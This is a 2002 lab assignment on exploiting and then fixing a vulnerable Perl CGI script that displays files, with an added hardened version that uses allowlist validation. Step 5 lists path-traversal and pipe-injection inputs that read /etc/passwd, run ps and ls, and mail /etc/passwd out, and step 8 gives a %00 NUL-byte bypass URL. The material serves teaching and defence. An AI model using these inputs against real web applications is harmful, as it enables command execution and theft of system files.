Assignments of day 1 in week #3

CGI exploit

Last Updated : Friday, 12-Apr-2002 15:30:47 HKT

Understand the Perl CGI exploit

  1. At your host, cd /home/httpd

  2. tar zxvf /usr/local2/wsh/cgi/demo.tar.gz
    After the tar command, you should have the following files under the /home/httpd directory:
    data/1.db
    data/2.db
    data/3.db
    cgi-bin/printdata1.cgi
    cgi-bin/printdata2.cgi
    html/query_data.html
    

  3. cp cgi-bin/printdata1.cgi cgi-bin/printdata.cgi

  4. Now browse the following URL
    http://your_host.wsh.hkntec.net/query_data.html

    This is a simple form that prints the contents of the file whose name you enter. In the form, you may enter "1.db", "2.db" or "3.db" to view the contents of these files.

  5. Now type the following inputs into the form and observe the output produced by each of them

    ../../../etc/passwd
    ../../../etc/inetd.conf
    ../../../bin/ls /etc|
    ../../../bin/ps -ef|
    ../../../bin/cat /etc/passwd|/bin/mail your_email|
    
  6. cp cgi-bin/printdata2.cgi cgi-bin/printdata.cgi

    Type diff cgi-bin/printdata1.cgi cgi-bin/printdata2.cgi to see the difference between the two programs. printdata2.cgi has been modified to check that the input file exists.

  7. Now try the inputs from step 5 again and observe the outputs. Compare these outputs with the ones you obtained in step 5.

  8. Now try the following URL:

    http://your_host.wsh.hkntec.net/cgi-bin/printdata.cgi?filename=..%2F..%2F..%2Fbin%2Fps%00%7C

    Why can this URL get around the refined printdata.cgi program?

  9. Rectify printdata.cgi so as to eliminate the above exploits.

  10. Put all your findings, including how to rectify the printdata.cgi, on your web pages.
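The following is an added illustration of the kind of rectification step 9 asks for. It is not the printdata1.cgi or printdata2.cgi shipped in demo.tar.gz, and its details (the /home/httpd/data directory, the use of the CGI.pm module, and the validate_filename helper) are assumptions; only the form field name filename is taken from the step 8 URL. The point it demonstrates is that an existence check alone is not a fix: the NUL byte in the step 8 URL ends the name as far as the C library's stat() is concerned, so the check passes, while Perl's two-argument open still sees the whole string and treats the trailing "|" as a request to run a command. The hardened version therefore rejects anything that is not a plain "name.db" before touching the filesystem, and opens the file with a three-argument open and an explicit read mode so the name is never interpreted.

```perl
#!/usr/bin/perl
# Hardened printdata.cgi, written for this page as an illustration.
# It is NOT the demo.tar.gz code; the data directory and helper name are assumed.
use strict;
use warnings;
use CGI qw(:standard);

# Directory holding 1.db, 2.db, 3.db (assumed to match the demo layout).
my $DATA_DIR = '/home/httpd/data';

# Return the validated bare filename, or undef if the input is unacceptable.
# Only a single path component of letters, digits, underscore or dash ending
# in ".db" is allowed, so "..", "/", "|", NUL bytes and whitespace all fail.
sub validate_filename {
    my ($name) = @_;
    return undef unless defined $name;
    return undef if $name =~ /\0/;                           # NUL truncation trick
    return undef unless $name =~ /\A[A-Za-z0-9_-]+\.db\z/;   # strict allowlist
    return $name;
}

my $file = validate_filename(param('filename'));

print header('text/plain');

unless (defined $file) {
    print "Invalid filename\n";
    exit 0;
}

my $path = "$DATA_DIR/$file";

# The existence test runs only on an already-validated name. On its own it
# would not be enough (see the step 8 URL), which is why the allowlist above
# comes first.
unless (-f $path) {
    print "No such file: $file\n";
    exit 0;
}

# Three-argument open with an explicit '<' mode: unlike two-argument
# open(FH, $path), the filename is taken literally, so a leading or trailing
# '|' can never turn the open into a command pipe.
open(my $fh, '<', $path) or do {
    print "Cannot open $file\n";
    exit 0;
};
print while <$fh>;
close $fh;
```

When rewriting the script, keep the validation as an allowlist of what a legitimate name looks like rather than a denylist of bad characters: a denylist that removes "../" or "|" is easy to get wrong (the %00 encoding in step 8 shows how a check on one form of the name can be defeated by another), whereas the regex above accepts exactly the names the form is meant to serve and nothing else.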

References: